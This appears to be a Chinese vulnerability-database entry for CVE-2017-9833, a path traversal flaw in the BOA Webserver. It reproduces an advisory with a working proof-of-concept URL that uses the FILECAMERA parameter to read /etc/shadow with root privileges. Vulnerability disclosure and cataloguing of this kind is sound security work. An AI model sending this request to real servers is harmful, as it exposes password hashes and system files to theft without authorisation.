CVE-2017-9833
CVSS5.0
发布时间 :2017-06-23 22:29:00
修订时间 :2017-08-11 21:29:08
NMP    

[原文]/cgi-bin/wapopen in BOA Webserver 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9833
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9833
(官方数据源) NVD

- 其它链接及资源

https://pastebin.com/raw/rt7LJvyF
(VENDOR_ADVISORY)  MISC  https://pastebin.com/raw/rt7LJvyF
https://www.exploit-db.com/exploits/42290/
(UNKNOWN)  EXPLOIT-DB  42290

- 漏洞信息 (F143237)

BOA Web Server 0.94.14rc21 Arbitrary File Access (PacketStormID:F143237)
2017-07-03 00:00:00
Miguel Mendez Z  
exploit,web,arbitrary
CVE-2017-9833
[点击下载]

BOA Web Server version 0.94.14rc21 an arbitrary file access vulnerability.

BOA Web Server 0.94.14 - Access to arbitrary files as privileges
 
Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833
 
 
Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials
 
Vulnerable variable:
FILECAMERA=../../etc/shadow%00
 
Exploit link:
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
 
Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站